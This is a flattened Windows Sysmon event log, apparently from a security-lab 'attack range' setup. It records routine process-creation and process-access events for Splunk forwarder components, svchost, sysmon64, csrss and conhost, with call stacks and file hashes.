Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000015572Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.792{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA5162EC3B56A2ACD4943A87B842138,SHA256=28287241BC96F034F6F781890510C923935BDE4E2B438DEDDD07EAFD99B96008,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015571Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.213{E5A8D418-E399-63C7-EC01-00000000B002}33923892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015570Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.027{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E399-63C7-EC01-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015569Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015568Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015567Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015566Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015565Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E399-63C7-EC01-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015564Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015563Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015562Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015561Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015560Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.024{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015559Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.022{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E399-63C7-EC01-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015558Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:33.023{E5A8D418-E399-63C7-EC01-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.922{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E399-63C7-1106-00000000AF02}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.922{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.922{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.922{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.922{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.922{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E399-63C7-1106-00000000AF02}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.922{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E399-63C7-1106-00000000AF02}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.923{FE4C2B44-E399-63C7-1106-00000000AF02}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.190{FE4C2B44-E399-63C7-1006-00000000AF02}64246476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.044{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E399-63C7-1006-00000000AF02}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.044{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.044{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 